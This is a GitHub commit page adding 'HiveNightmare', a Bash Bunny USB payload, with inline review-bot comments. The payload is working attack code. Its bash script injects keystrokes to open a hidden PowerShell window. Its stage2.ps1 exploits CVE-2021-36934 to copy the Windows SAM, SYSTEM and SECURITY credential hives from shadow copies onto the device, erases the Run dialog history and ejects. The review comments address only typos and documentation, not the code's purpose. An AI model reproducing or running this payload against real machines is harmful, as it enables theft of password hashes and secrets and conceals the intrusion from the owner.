New payload: HiveNightmare (#462)

Leverages CVE-2021-36934 to get SAM/SYSTEM/SECURITY hives.
This commit is contained in:
9o3 2021-08-24 21:30:47 +02:00 committed by GitHub
parent 9fdacee185
commit 605b7f1cab
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 81 additions and 0 deletions


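--- /dev/null
+++ b/<readme-path-not-shown-on-page>
@@ -0,0 +1,7 @@
+# HiveNightmare
+Leverages CVE-202136934 to get SAM/SYSTEM/SECURITY hives.
+## Options
+### TRIES
+> The amount of shadowcopies to search for the SAM/SYSTEM/SECURITY hives.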


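--- /dev/null
+++ b/<stage-one-script-path-not-shown-on-page>
@@ -0,0 +1,48 @@
+#!/bin/bash
+#
+# Title: HiveNightmare
+# Description: Leverages CVE-202136934 to get SAM/SYSTEM/SECURITY hives.
+# Author: 9o3
+# Twitter: @BugBot4
+# Version: 1.0
+# Category: Exfiltration
+# Attackmodes: HID, Storage
+#
+# LED STATUS
+# ==========
+# SETUP.......Create stage file and loot folder
+# ATTACK......Run hidden PowerShell window that gets SAM/SYSTEM/SECURITY hives using shadow copies (CVE-2021-36934)
+# CLEANUP.....Remove generated files
+# FINISH......Finished
+#
+# OPTIONS
+# =======
+# TRIES => Number of shadow copies to try to find SAM/SYSTEM/SECURITY hives in.
+TRIES=10
+######## Create stage file and loot folder ########
+# Alter second stage based on settings & create loot folder if it does not yet exist. Removes previous DONE file if present.
+LED SETUP
+GET SWITCH_POSITION
+cd /root/udisk/payloads/$SWITCH_POSITION
+sed -e "s/<#TR#>/$TRIES/g" stage2.ps1 > 2
+mkdir -p /root/udisk/loot/HiveNightmare
+rm /root/udisk/DONE
+ATTACKMODE HID STORAGE
+######## Run hidden PowerShell window ########
+# Run hidden PowerShell window which executes the content of the stage2.ps1 file.
+LED ATTACK
+RUN WIN "powershell -w 1 -NoP iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\2')-Raw)"
+until [ -f /root/udisk/DONE ]
+do
+sleep 0.2
+done
+######## Remove generated files ########
+# Removes the generated files and sync file system
+LED CLEANUP
+rm 2
+rm /root/udisk/DONE
+sync
+LED FINISH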
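Review bot: The `# Description:` header line writes the CVE id as `CVE-202136934`, without the hyphen between year and number, while the `# ATTACK` LED line a few lines down writes `CVE-2021-36934`; the header is what readers and index tooling pick up first, so it should read `# Description: Leverages CVE-2021-36934 to get SAM/SYSTEM/SECURITY hives.`. The README section above carries the same missing hyphen. The `# TRIES =>` option comment could also say where the value takes effect, since that is not visible from the header alone: `# TRIES => Number of shadow copies to try; substituted for <#TR#> in stage2.ps1 by the sed in the SETUP step.`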


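--- /dev/null
+++ b/stage2.ps1
@@ -0,0 +1,26 @@
+#Remove latest run entry
+$p = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"; $m = "MRUList"; $l=gpv $p $m; rp $p $l[0]; sp $p $m $l.Substring(1);
+#Set variables and create loot folder
+$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;
+$loot = $bb+"loot\HiveNightmare\";
+$usr = (whoami) -replace "\\","_";
+New-Item -ItemType Directory -Force -Path $loot$usr;
+$i = 0;
+$found = $FALSE;
+while($i -lt <#TR#>) {
+try {
+[System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy"+$i+"\Windows\System32\config\SAM",$loot+$usr+"\SAM");
+$found = $TRUE;
+break;
+} catch {$i++}
+}
+if($found){
+[System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy"+$i+"\Windows\System32\config\SYSTEM",$loot+$usr+"\SYSTEM");
+[System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy"+$i+"\Windows\System32\config\SECURITY",$loot+$usr+"\SECURITY");
+}
+#Let the Bash Bunny know we're done here & Eject.
+New-Item -ItemType file $bb"DONE";
+(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");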
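Review bot: The `<#TR#>` token in the `while($i -lt <#TR#>)` condition is a template placeholder, but nothing in this file says so; PowerShell reads `<#`…`#>` as a block comment, so as committed the `-lt` is left with no right operand and the file only parses after the stage-one script's `sed -e "s/<#TR#>/$TRIES/g"` has replaced it. A top-of-file comment should state that dependency, e.g. `# Template: <#TR#> is replaced with the TRIES option by the stage-one script before this file is executed.`. The `if($found)` block also relies on `$i` still holding the index of the iteration that succeeded, which is only true because of the `break` inside the `try`; a one-line comment such as `# $i is the shadow copy index the SAM copy succeeded on` would save the next reader a re-read.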